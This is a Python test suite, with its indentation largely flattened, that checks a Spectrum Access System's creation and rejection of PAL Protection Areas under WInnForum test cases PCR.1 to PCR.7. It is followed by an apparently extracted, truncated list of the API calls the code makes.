pal_record_b['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Device_a is Category A.
self.assertEqual(device_a['cbsdCategory'], 'A')
# Device_b is Category B with conditionals pre-loaded.
self.assertEqual(device_b['cbsdCategory'], 'B')
# Make PAL records consistent.
pal_records = makePalRecordsConsistent([pal_record_a, pal_record_b],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
    # Set the locations of the devices to reside within the service area.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
    # Place device_c between device_a and device_b within the service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 39.0426, -100.4457
device_c['installationParam']['heightType'] = 'AGL'
# Set the AntennaGain and EIRP capability.
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records,
'sasTestHarnessCert': getCertFilename('sas.cert'),
'sasTestHarnessKey': getCertFilename('sas.key')
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_1_default_config)
def test_WINNF_FT_S_PCR_1(self, config_filename):
"""Successful Maximum PPA Creation.
    Checks that the PPA generated by the SAS UUT is fully contained within the service area.
"""
# Load the Config file
config = loadConfig(config_filename)
# Very light checking of the config file.
self.assertValidConfig(
config, {
'registrationRequests': list,
'conditionalRegistrationData': list,
'palRecords': list,
'sasTestHarnessCert': basestring,
'sasTestHarnessKey': basestring
})
# Register devices and check response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
    # The REG-Conditional values don't exist in the registrationRequest; they are
    # required by the PPA reference model, so copy them in from the conditional data.
assertRegConditionalsForPpaRefModel(config['registrationRequests'],
config['conditionalRegistrationData'])
    # Trigger PPA creation to calculate the maximum PPA boundary and check whether any
    # errors are encountered in the PPA creation reference model.
test_harness_ppa_geometry = ppa.PpaCreationModel(config['registrationRequests'],
config['palRecords'])
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Trigger SAS UUT to create a PPA boundary.
pal_ids = [record['palId'] for record in config['palRecords']]
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Notify SAS UUT about SAS Harness and trigger Full Activity Dump and
# retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=config['sasTestHarnessCert'],
ssl_key=config['sasTestHarnessKey'])
# Write SAS UUT PPA to output directory of PCR.1 test.
# PPA Zone received from SAS UUT in PCR.1 test will be considered as input
# for PCR 3,PCR 6 and PCR 7 tests.
ppa_zone_data_file_path = getSasUutClaimedPpaBoundaryFilePath(
config_filename.split('/')[-1])
ppa_zone_data_dir_path = os.path.dirname(ppa_zone_data_file_path)
if not os.path.exists(ppa_zone_data_dir_path):
os.makedirs(ppa_zone_data_dir_path)
with open(ppa_zone_data_file_path, 'w') as file_handle:
file_handle.write(
json.dumps(uut_ppa_zone_data['zone'], indent=2, sort_keys=False,
separators=(',', ': ')))
# Check if the PPA generated by the SAS UUT is fully contained within the
# service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("Reference model PPA - retrieved through PpaCreationModel:%s",
json.dumps(json.loads(test_harness_ppa_geometry), indent=2,
sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
    # Check that Equation 8.3.1 in the Test Specification is satisfied w.r.t.
    # [n.12, R2-PAL-05]: the area of the non-overlapping difference between
    # the maximum PPA boundary created by the SAS UUT and the one created by the
    # Reference Model is no more than 10% of the area of the Reference Model boundary.
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry,
uut_ppa_geometry))
def generate_PCR_2_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 2."""
# Load PAL records.
pal_record_a = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_b = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_a['fipsCode'] = 20063955100
pal_record_b['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices.
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Device_a is Category A.
self.assertEqual(device_a['cbsdCategory'], 'A')
# Device_b is Category B with conditionals pre-loaded.
self.assertEqual(device_b['cbsdCategory'], 'B')
# Make PAL record consistent.
pal_records = makePalRecordsConsistent([pal_record_a, pal_record_b],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
# Set the values of CBSD location, antenna gain, and EIRP limit such that a
# single PPA can be formed.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 38.74021, -100.53862
# At least one of the CBSDs is close to the boundary of the Service Area,
# so that -96 dBm/10 MHz protection contour extends beyond the service area boundary.
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 38.70645, -100.46034
    # Place device_c between device_a and device_b within the service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 38.72281, -100.50103
device_c['installationParam']['heightType'] = 'AGL'
# Set the AntennaGain and EIRP capability in a way that only
    # one PPA zone is created by those CBSDs using the PPA Creation Reference Model.
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records,
'sasTestHarnessCert': getCertFilename('sas.cert'),
'sasTestHarnessKey': getCertFilename('sas.key')
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_2_default_config)
def test_WINNF_FT_S_PCR_2(self, config_filename):
"""Successful Maximum PPA Boundary Creation Clipped by Service Area Boundary.
Checks the maximum PPA boundary, being clipped by the Service Area composed of
one or more adjacent Census Tracts.
    Checks that the PPA generated by the SAS UUT is fully contained within the service area.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Register devices and check response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
    # The REG-Conditional values don't exist in the registrationRequest; they are
    # required by the PPA reference model, so copy them in from the conditional data.
assertRegConditionalsForPpaRefModel(config['registrationRequests'],
config['conditionalRegistrationData'])
    # Trigger PPA creation to calculate the maximum PPA boundary and check whether any
    # errors are encountered in the PPA creation reference model.
test_harness_ppa_geometry = ppa.PpaCreationModel(config['registrationRequests'],
config['palRecords'])
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Trigger Full Activity Dump and retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=config['sasTestHarnessCert'],
ssl_key=config['sasTestHarnessKey'])
# Check if the PPA generated by the SAS UUT is fully contained within the service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("Reference model PPA - retrieved through PpaCreationModel:%s",
json.dumps(json.loads(test_harness_ppa_geometry), indent=2, sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
    # Check that Equation 8.3.1 in the Test Specification is satisfied w.r.t.
    # [n.12, R2-PAL-05]: the area of the non-overlapping difference between
    # the maximum PPA boundary created by the SAS UUT and the one created by the
    # Reference Model is no more than 10% of the area of the Reference Model boundary.
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry,
uut_ppa_geometry))
def generate_PCR_3_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 3."""
    # Configuration file used in the PCR.1 test that generated the SAS UUT claimed PPA boundary.
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
# SAS UUT claimed ppa boundary generated in PCR.1 test.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as claimed_ppa_file:
user_claimed_ppa_contour = json.load(claimed_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Shrink the user claimed ppa boundary by approximately 1 kilometer.
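    # (A shrink of 1e-2 degrees corresponds to roughly 1.1 km of latitude, keeping the
    # claimed contour strictly inside the SAS UUT maximum PPA boundary.)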
user_claimed_ppa_contour_feature_collection = utils.InsureFeatureCollection(
utils.ShrinkAndCleanPolygon(
user_claimed_ppa_contour['features'][0]['geometry'], 1e-2),
as_dict=True)
# Create the actual config
config = {
'configPCR_1': pcr_1_test_config_file_path,
'userClaimedPpaContour': user_claimed_ppa_contour_feature_collection
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_3_default_config)
def test_WINNF_FT_S_PCR_3(self, config_filename):
"""Successful PPA Confirmation with Claimed Boundary by PAL Holder.
    Checks that the PPA generated by the SAS UUT is fully contained within the service area.
    Checks that the SAS UUT confirms a valid PPA boundary claimed by the PAL holder,
    composed of one or more adjacent Census Tracts.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
# Create PPA creation request with user claimed ppa contour.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids,
"providedContour": config['userClaimedPpaContour']
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Trigger Full Activity Dump and retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=pcr_1_test_config['sasTestHarnessCert'],
ssl_key=pcr_1_test_config['sasTestHarnessKey'])
# Check if the PPA generated by the SAS UUT is fully contained within the service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("User claimed PPA boundary:%s",
json.dumps(config['userClaimedPpaContour'], indent=2, sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(pcr_1_test_config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
# Check the maximum PPA boundary created by SAS UUT is identical with the maximum
# PPA claimed boundary.
test_harness_ppa_geometry = config['userClaimedPpaContour']['features'][0]['geometry']
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry, uut_ppa_geometry))
def generate_PCR_4_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 4."""
# Load PAL records.
pal_record_1 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_2 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_1['fipsCode'] = 20063955100
pal_record_2['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Make PAL records consistent.
pal_records = makePalRecordsConsistent([pal_record_1, pal_record_2],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
# Set the values of CBSD location, antenna gain, and EIRP limit such that a
# single PPA can be formed.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
# At least one of the CBSDs is located outside the service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 39.09755, -99.9179
device_c['installationParam']['heightType'] = 'AGL'
    # Set the AntennaGain and EIRP capability in a way that only one PPA zone is created
    # by those CBSDs.
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_c['installationParam']['eirpCapability'] = 30
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
device_c['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_4_default_config)
def test_WINNF_FT_S_PCR_4(self, config_filename):
"""Unsuccessful PPA Creation with one or more CBSDs Outside Service Area.
Checks SAS UUT rejects creation of a PPA boundary if at least one of the CBSDs
included in the CBSD cluster list is located outside PAL holder service area.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
# Create PPA creation request to SAS UUT.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT and expect the failure response.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_5_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 5."""
# Load PAL records.
pal_record_1 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_2 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_1['fipsCode'] = 20063955100
pal_record_2['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
    # Light check to ensure the CBSD userIds are not the same.
self.assertNotEqual(device_a['userId'], device_b['userId'])
# The userId of at least one of the CBSDs is not associated to the userId of
# the PAL Holder configured in the PAL record for this service area.
pal_records = makePalRecordsConsistent([pal_record_1, pal_record_2], pal_low_frequency,
pal_high_frequency,
device_a['userId'])
# CBSDs are located inside the service area.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_5_default_config)
def test_WINNF_FT_S_PCR_5(self, config_filename):
"""Unsuccessful PPA Creation with one or more CBSDs Outside Service Area.
Checks SAS UUT rejects creation of a PPA boundary if at least one of
the CBSDs included in the CBSD cluster list does not belong to the PAL holder.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
# Create PPA creation request to SAS UUT.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT and expect the failure response.
# SAS does not create a PPA and generates an error.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_6_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 6."""
# File path where SAS UUT claimed ppa boundary generated in PCR.1 test
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
    # Load the SAS UUT claimed PPA boundary generated in the PCR.1 test and report an
    # error if it cannot be read.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as claimed_ppa_file:
user_claimed_ppa_contour = json.load(claimed_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Expand the user claimed ppa boundary by approximately 1 kilometer.
user_claimed_ppa_contour_feature_collection = utils.InsureFeatureCollection(
utils.ShrinkAndCleanPolygon(
user_claimed_ppa_contour['features'][0]['geometry'], -1e-2),
as_dict=True)
# Create the actual config.
config = {
'configPCR_1': pcr_1_test_config_file_path,
'userClaimedPpaContour': user_claimed_ppa_contour_feature_collection
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_6_default_config)
def test_WINNF_FT_S_PCR_6(self, config_filename):
"""Unsuccessful PPA boundary Claimed by PAL Holder Not contained within Maximum PPA Boundary.
SAS UUT shall reject a PPA boundary claimed by the PAL holder,
that is not fully contained within the maximum PPA boundary created by SAS UUT.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
# Create PPA creation request with user claimed ppa contour.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids,
"providedContour": config['userClaimedPpaContour']
}
# Trigger PPA Creation to SAS UUT.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_7_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 7."""
# File path where SAS UUT claimed ppa boundary generated in PCR.1 test
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
    # Load the SAS UUT claimed PPA boundary generated in the PCR.1 test and report an
    # error if it cannot be read.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as overlapped_ppa_file:
overlapping_ppa_contour = json.load(overlapped_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Shrink the user claimed ppa boundary by approximately 1 kilometer.
overlapping_ppa_contour_geometry = utils.ShrinkAndCleanPolygon(
overlapping_ppa_contour['features'][0]['geometry'], 1e-2)
# Create ppa_record where user claimed PPA contour will be replaced.
overlapping_ppa_record = json.load(
open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
    # Wrap the overlapping contour geometry in a GeoJSON FeatureCollection for the PPA record's zone.
overlapping_ppa_record['zone'] = {'type':'FeatureCollection',
'features': [
{'type': 'Feature',
'properties': {},
'geometry': overlapping_ppa_contour_geometry}
]}
# Load PCR.1 configuration.
pcr_1_test_config = loadConfig(pcr_1_test_config_file_path)
# Set the pal_record used in PCR.1 tests.
pcr_1_pal_records = pcr_1_test_config['palRecords']
    # Update the PPA record based on the PAL records.
    overlapping_ppa_record['ppaInfo']['palId'] = [pal['palId'] for pal in pcr_1_pal_records]
    overlapping_ppa_record['id'] = 'zone/ppa/%s/%s/%s' % (overlapping_ppa_record['creator'],
                                                          overlapping_ppa_record['ppaInfo']['palId'][0],
                                                          uuid.uuid4().hex)
    overlapping_ppa_record['ppaInfo']['ppaBeginDate'] = pcr_1_pal_records[0]['license']['licenseDate']
    overlapping_ppa_record['ppaInfo']['ppaExpirationDate'] = pcr_1_pal_records[0]['license']['licenseExpiration']
# Create the actual config.
config = {
'configPCR_1': pcr_1_test_config_file_path,
'overlapPpaRecord': overlapping_ppa_record
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_7_default_config)
def test_WINNF_FT_S_PCR_7(self, config_filename):
"""Overlapping PPA Boundaries.
    Checks that the SAS UUT does not create a PPA zone within the service area
    when a valid PPA boundary claimed by the PAL holder, composed of one or more
    adjacent Census Tracts, is overlapped by another PPA zone.
    """
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Inject the overlap ppa zone into SAS UUT.
zone_id = self._sas_admin.InjectZoneData({'record': config['overlapPpaRecord']})
self.assertTrue(zone_id)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
    # Create a PPA creation request with devices that are already part of an
    # existing PPA zone.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
    # Trigger PPA creation on the SAS UUT and check that it does not create a PPA whose
    # claimed boundary is overlapped by the existing PPA zone.
self.assertPpaCreationFailure(ppa_creation_request)
|
[
"util.configurable_testcase",
"json.dumps",
"reference_models.geo.utils.ShrinkAndCleanPolygon",
"reference_models.geo.utils.PolygonsAlmostEqual",
"os.path.join",
"json.loads",
"util.getCertificateFingerprint",
"os.path.dirname",
"os.path.exists",
"util.loadConfig",
"util.getCertFilename",
"reference_models.ppa.ppa.PpaCreationModel",
"reference_models.geo.drive.census_tract_driver.GetCensusTract",
"util.writeConfig",
"shapely.ops.cascaded_union",
"full_activity_dump_helper.getFullActivityDumpSasUut",
"reference_models.geo.utils.ToShapely",
"util.makePalRecordsConsistent",
"json.load",
"logging.debug",
"os.makedirs",
"uuid.uuid4"
] |
[((1789, 1849), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""output"""', '"""test_WINNF_FT_S_PCR_1"""'], {}), "('testcases', 'output', 'test_WINNF_FT_S_PCR_1')\n", (1801, 1849), False, 'import os\n'), ((2036, 2097), 'os.path.join', 'os.path.join', (['ppa_zone_data_dir_path', 'ppa_zone_data_file_name'], {}), '(ppa_zone_data_dir_path, ppa_zone_data_file_name)\n', (2048, 2097), False, 'import os\n'), ((3152, 3193), 'shapely.ops.cascaded_union', 'ops.cascaded_union', (['census_tracts_for_pal'], {}), '(census_tracts_for_pal)\n', (3170, 3193), False, 'from shapely import ops\n'), ((3275, 3309), 'reference_models.geo.utils.ToShapely', 'utils.ToShapely', (['ppa_zone_geometry'], {}), '(ppa_zone_geometry)\n', (3290, 3309), False, 'from reference_models.geo import drive, utils\n'), ((10876, 10928), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_1_default_config'], {}), '(generate_PCR_1_default_config)\n', (10897, 10928), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18475, 18527), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_2_default_config'], {}), '(generate_PCR_2_default_config)\n', (18496, 18527), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23074, 23126), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_3_default_config'], {}), '(generate_PCR_3_default_config)\n', (23095, 23126), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((29018, 29070), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_4_default_config'], {}), '(generate_PCR_4_default_config)\n', (29039, 29070), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32512, 32564), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_5_default_config'], {}), '(generate_PCR_5_default_config)\n', (32533, 32564), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35178, 35230), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_6_default_config'], {}), '(generate_PCR_6_default_config)\n', (35199, 35230), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39481, 39533), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_7_default_config'], {}), '(generate_PCR_7_default_config)\n', (39502, 39533), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((6841, 6876), 'util.getCertificateFingerprint', 'getCertificateFingerprint', (['ssl_cert'], {}), '(ssl_cert)\n', (6866, 6876), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((7226, 7298), 
